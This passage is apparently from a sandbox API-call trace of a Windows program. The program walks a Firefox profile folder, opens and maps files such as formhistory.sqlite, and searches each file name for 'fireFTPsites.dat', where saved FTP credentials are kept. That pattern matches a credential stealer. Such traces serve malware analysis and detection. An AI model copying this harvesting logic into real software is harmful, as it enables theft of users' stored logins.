(lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.258] CloseHandle (hObject=0x4c8) returned 1 [0590.258] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5d [0590.258] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x2ed9860 [0590.258] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite", lpDst=0x2ed9860, nSize=0x5d | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite") returned 0x5d [0590.258] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.258] CloseHandle (hObject=0x4c8) returned 1 [0590.258] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.258] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18000 [0590.258] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.258] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.259] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57b690 [0590.259] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.259] CloseHandle (hObject=0x660) returned 1 [0590.259] CloseHandle (hObject=0x4c8) returned 1 [0590.259] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.259] StrStrIW (lpFirst="downloads.sqlite", lpSrch="fireFTPsites.dat") returned 0x0 [0590.260] LocalFree (hMem=0x56cab0) returned 0x0 [0590.260] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.260] lstrlenW (lpString="\\") returned 1 [0590.260] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.260] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.260] lstrlenW (lpString="extensions.ini") returned 14 [0590.260] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.260] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56cab0 [0590.260] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.260] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.260] CloseHandle (hObject=0x4c8) returned 1 [0590.260] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0590.260] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x2ed9860 [0590.260] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini", lpDst=0x2ed9860, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini") returned 0x5b [0590.260] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.260] CloseHandle (hObject=0x4c8) returned 1 [0590.260] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.260] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8d [0590.260] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.260] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.260] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57b960 [0590.260] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.261] CloseHandle (hObject=0x660) returned 1 [0590.261] CloseHandle (hObject=0x4c8) returned 1 [0590.261] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.261] StrStrIW (lpFirst="extensions.ini", lpSrch="fireFTPsites.dat") returned 0x0 [0590.261] LocalFree (hMem=0x56cab0) returned 0x0 [0590.261] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.261] lstrlenW (lpString="\\") returned 1 [0590.261] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.261] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.261] lstrlenW (lpString="extensions.sqlite") returned 17 [0590.261] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.261] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56cab0 [0590.261] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.261] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.261] CloseHandle (hObject=0x4c8) returned 1 [0590.261] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5e [0590.261] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x2ed9860 [0590.261] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite", lpDst=0x2ed9860, nSize=0x5e | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite") returned 0x5e [0590.261] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.261] CloseHandle (hObject=0x4c8) returned 1 [0590.261] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.261] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x70000 [0590.261] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.261] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3680000 [0590.263] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57b9f0 [0590.263] UnmapViewOfFile (lpBaseAddress=0x3680000) returned 1 [0590.266] CloseHandle (hObject=0x660) returned 1 [0590.266] CloseHandle (hObject=0x4c8) returned 1 [0590.266] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.266] StrStrIW (lpFirst="extensions.sqlite", lpSrch="fireFTPsites.dat") returned 0x0 [0590.266] LocalFree (hMem=0x56cab0) returned 0x0 [0590.266] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.266] lstrlenW (lpString="\\") returned 1 [0590.266] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.266] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.266] lstrlenW (lpString="formhistory.sqlite") returned 18 [0590.266] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.266] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x56cab0 [0590.266] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.266] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.266] CloseHandle (hObject=0x4c8) returned 1 [0590.266] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5f [0590.266] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x2ed9860 [0590.266] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite", lpDst=0x2ed9860, nSize=0x5f | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite") returned 0x5f [0590.266] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.266] CloseHandle (hObject=0x4c8) returned 1 [0590.266] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.266] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x30000 [0590.266] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.267] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.268] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57ba80 [0590.268] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.269] CloseHandle (hObject=0x660) returned 1 [0590.269] CloseHandle (hObject=0x4c8) returned 1 [0590.269] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.269] StrStrIW (lpFirst="formhistory.sqlite", lpSrch="fireFTPsites.dat") returned 0x0 [0590.269] LocalFree (hMem=0x56cab0) returned 0x0 [0590.269] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.269] lstrcmpiW (lpString1="healthreport", lpString2=".") returned 1 [0590.269] lstrcmpiW (lpString1="healthreport", lpString2="..") returned 1 [0590.269] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.269] lstrlenW (lpString="\\") returned 1 [0590.269] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.269] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.269] lstrlenW (lpString="healthreport") returned 12 [0590.269] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.269] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56cab0 [0590.269] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.269] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport") returned 88 [0590.269] lstrlenW (lpString="\\*.*") returned 4 [0590.269] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport") returned 88 [0590.269] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x2ed9860 [0590.269] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport\\*.*", lpFindFileData=0x52dd24 | out: lpFindFileData=0x52dd24) returned 0x57ca60 [0590.269] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.269] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd24 | out: lpFindFileData=0x52dd24) returned 1 [0590.269] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.269] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.269] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd24 | out: lpFindFileData=0x52dd24) returned 0 [0590.269] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0590.269] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.269] LocalFree (hMem=0x56cab0) returned 0x0 [0590.269] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.269] lstrlenW (lpString="\\") returned 1 [0590.269] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.269] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.270] lstrlenW (lpString="healthreport.sqlite") returned 19 [0590.270] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.270] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56cab0 [0590.270] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.270] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.270] CloseHandle (hObject=0x4c8) returned 1 [0590.270] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x60 [0590.270] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x2ed9860 [0590.270] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite", lpDst=0x2ed9860, nSize=0x60 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite") returned 0x60 [0590.270] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.270] CloseHandle (hObject=0x4c8) returned 1 [0590.270] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.270] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x118000 [0590.270] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.270] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0590.280] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57bb10 [0590.280] UnmapViewOfFile (lpBaseAddress=0x3800000) returned 1 [0590.282] CloseHandle (hObject=0x660) returned 1 [0590.282] CloseHandle (hObject=0x4c8) returned 1 [0590.282] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.282] StrStrIW (lpFirst="healthreport.sqlite", lpSrch="fireFTPsites.dat") returned 0x0 [0590.282] LocalFree (hMem=0x56cab0) returned 0x0 [0590.282] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.282] lstrcmpiW (lpString1="indexedDB", lpString2=".") returned 1 [0590.282] lstrcmpiW (lpString1="indexedDB", lpString2="..") returned 1 [0590.282] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.282] lstrlenW (lpString="\\") returned 1 [0590.282] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.282] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.282] lstrlenW (lpString="indexedDB") returned 9 [0590.282] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.282] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x63bbf0 [0590.282] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.282] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0590.282] lstrlenW (lpString="\\*.*") returned 4 [0590.282] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0590.282] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.282] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\*.*", lpFindFileData=0x52dd24 | out: lpFindFileData=0x52dd24) returned 0x57ca60 [0590.282] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.282] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd24 | out: lpFindFileData=0x52dd24) returned 1 [0590.282] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.282] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.282] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd24 | out: lpFindFileData=0x52dd24) returned 1 [0590.282] lstrcmpiW (lpString1="moz-safe-about+home", lpString2=".") returned 1 [0590.282] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="..") returned 1 [0590.282] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0590.282] lstrlenW (lpString="\\") returned 1 [0590.282] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0590.282] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x63bd28 [0590.282] lstrlenW (lpString="moz-safe-about+home") returned 19 [0590.282] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\") returned 86 [0590.282] LocalAlloc (uFlags=0x40, uBytes=0x154) returned 0x5e6108 [0590.282] LocalFree (hMem=0x63bd28) returned 0x0 [0590.282] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0590.282] lstrlenW (lpString="\\*.*") returned 4 [0590.283] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0590.283] LocalAlloc (uFlags=0x40, uBytes=0x15c) returned 0x63f8c8 [0590.283] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\*.*", lpFindFileData=0x52daac | out: lpFindFileData=0x52daac) returned 0x57c9a0 [0590.283] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.283] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daac | out: lpFindFileData=0x52daac) returned 1 [0590.283] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.283] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.283] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daac | out: lpFindFileData=0x52daac) returned 1 [0590.283] lstrlenW (lpString="\\") returned 1 [0590.283] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0590.283] LocalAlloc (uFlags=0x40, uBytes=0x156) returned 0x63fa30 [0590.283] lstrlenW (lpString=".metadata") returned 9 [0590.283] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\") returned 106 [0590.283] LocalAlloc (uFlags=0x40, uBytes=0x168) returned 0x63fb90 [0590.283] LocalFree (hMem=0x63fa30) returned 0x0 [0590.283] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.283] CloseHandle (hObject=0x668) returned 1 [0590.283] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x74 [0590.283] LocalAlloc (uFlags=0x40, uBytes=0x168) returned 0x63fd00 [0590.283] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata", lpDst=0x63fd00, nSize=0x74 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata") returned 0x74 [0590.283] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.283] CloseHandle (hObject=0x668) returned 1 [0590.283] CreateFileW 